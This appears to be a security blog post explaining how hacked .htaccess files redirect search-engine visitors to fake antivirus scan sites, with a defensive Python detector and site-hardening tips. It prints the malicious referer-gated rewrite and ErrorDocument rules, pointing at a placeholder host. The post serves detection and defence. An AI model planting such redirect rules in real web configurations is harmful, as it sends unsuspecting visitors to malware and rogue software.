Result of a Redirect: Antivirus 2009 Fake Scan Page

Recently, we’ve come across a number of legitimate sites that have been hacked to redirect to various rogue anti-malware “scan” sites (including Antivirus2009).

The hack involves a twist. Visiting the sites directly (i.e. via a bookmark or manually entering the address) results in no redirect and, often, no signs of the hack. The malicious redirect only occurs when a user arrives at the site via search engine results.

This clever tactic serves to effectively delay any fixes. Site owners visiting their site directly won’t see any evidence of the redirect. But since many sites receive a majority of their traffic from search engines, that large majority of users will keep getting redirected to the malicious site.

The root cause of many of these hacks is a maliciously modified .htaccess file (commonly used on Apache web servers). In some cases it’s replaced completely, in other cases the bad rules are added to the existing contents. Most of the .htaccess files contain bad lines similar to the following:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC]
...
RewriteRule .* http://badsite-omitted/ [R=301,L]

For those not familiar with the innards of Apache or .htaccess files, this basically means:

Redirect any users who arrive from Google, Yahoo, MSN, or other search engines to “badsite”.

In some cases, common error pages are also redirected by the .htaccess file:

ErrorDocument 404 http://badsite-omitted/

The end result, of course, is that numerous unsuspecting users get redirected to sites pushing malware, spyware, rogue/fake anti-virus programs, and other junk.
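As an added example (not code from the original post), the following Python script parses referer-gated rewrite rules like the ones shown above and simulates how Apache evaluates them for a given Referer header, which shows why a direct visit sees nothing while an arrival from a search engine is redirected; it also lists ErrorDocument lines that point off-site. The .htaccess sample is constructed and the redirect target is a placeholder, not a real domain.

```python
import re
from urllib.parse import urlparse

# Constructed sample of the referer-gated rules the post describes; the target is a placeholder.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC]
RewriteRule .* http://badsite-omitted/ [R=301,L]
ErrorDocument 404 http://badsite-omitted/
"""

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
ERRDOC_RE = re.compile(r"^\s*ErrorDocument\s+(\d{3})\s+(https?://\S+)", re.I | re.M)

def parse_referer_rules(text):
    """Return [(conditions, target)]: each RewriteRule together with the HTTP_REFERER
    conditions that precede it; a condition is (regex, set of flags)."""
    rules, pending = [], []
    for line in text.splitlines():
        if (m := COND_RE.match(line)):
            flags = {f.strip().upper() for f in (m.group(2) or "").split(",") if f.strip()}
            pending.append((m.group(1), flags))
        elif (m := RULE_RE.match(line)):
            if pending:
                rules.append((pending, m.group(2)))
            pending = []  # a RewriteRule consumes the conditions stacked above it
    return rules

def redirect_for(rules, referer):
    """Simulate Apache for one Referer value: conditions are ANDed, except that [OR]
    joins a condition with the next one; [NC] is case-insensitive. None = no redirect."""
    for conds, target in rules:
        groups, cur = [], []  # split the chain into AND-ed groups of OR-ed patterns
        for p, f in conds:
            cur.append((p, f))
            if "OR" not in f:
                groups, cur = groups + [cur], []
        groups += [cur] if cur else []
        if all(any(re.search(p, referer, re.I if "NC" in f else 0) for p, f in g) for g in groups):
            return target
    return None

def external_error_docs(text, own_host):
    """ErrorDocument lines that send error pages to a host other than our own."""
    return [(c, u) for c, u in ERRDOC_RE.findall(text) if urlparse(u).hostname != own_host]
```

Run it against a copy of your own .htaccess (and your own hostname) rather than the sample; any rule that only fires for search-engine referers, or any ErrorDocument pointing to a host you don't control, deserves a close look.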

How Did The Sites Get Hacked?

In many of these hacks, it seems as though lax file and folder permissions on shared hosting servers allowed other compromised accounts on the same physical server to overwrite the .htaccess files in otherwise unrelated sites. It’s also possible that unpatched, old versions of software installed on the compromised sites themselves allowed hackers to take advantage of a publicly-known vulnerability to compromise the site and overwrite the .htaccess file.

What Should I Do If It Happens to My Site?

Contact your web hosting provider immediately.

If you know what you’re doing, you can remove the offending code that has likely been placed in your .htaccess file(s), and change all of your passwords. But you still need an expert to look over your site to determine how the hackers got in, if they left anything else or any other changes, and to prevent it from happening again. If you don’t figure out how your site was hacked and fix it, it will happen again.

Basic Site Protection Tips

Even if you just have a small personal site, you should follow some simple tips to help keep it secure.

  1. Keep any software installed on your site up-to-date.
    Forum, blog, and other web applications often release frequent updates. Although it can be a pain, you should always ensure the latest versions are installed on your server. There’s often little easier for hackers than exploiting a publicly-known hole in old versions of this software. (In many cases, they have automated tools to do it.)
  2. Keep up-to-date on patches for the software installed on *your* computer.
    Don’t give anyone an easy way to access passwords or other important programs/data that might be stored on your computer. Keep your operating system and any other programs you use up-to-date. (Especially any tools you use to work with your site – including your web browser, FTP utilities, etc.)
  3. Know the “least-permissions” mantra, and use it well.
    On Unix servers, never set file permissions to 777 unless absolutely necessary. Many of the hacked sites we’ve come across likely had their .htaccess files set to 777 permissions (writable by anyone), to allow software installed on their server to modify them. Take the extra couple of minutes and make the modifications yourself – or set the permission to 777 only temporarily, and immediately revert them to 644 (or less) as soon as possible (e.g. after you’ve set up/installed your blog software).
    Also, consider using admin accounts only for administrator-level tasks. Create a separate account (in your forums, blog, etc.) for posting, and use it the majority of the time. (This will help limit the potential damage from cross-site-scripting vulnerabilities and other attacks.)
  4. Visit your site from search engine results pages.
    Possibly the easiest item on the list. Visit your site the way the majority of your users visit it: if you get lots of incoming traffic from search engines, then make sure you arrive at your site from a search engine results page every once in a while, to keep an eye out for any clever hacks or suspicious behavior.

Of course, that’s only the start. It’s tough to keep on top of everything, but with the simple steps above you’ll give your site a better chance of staying safe.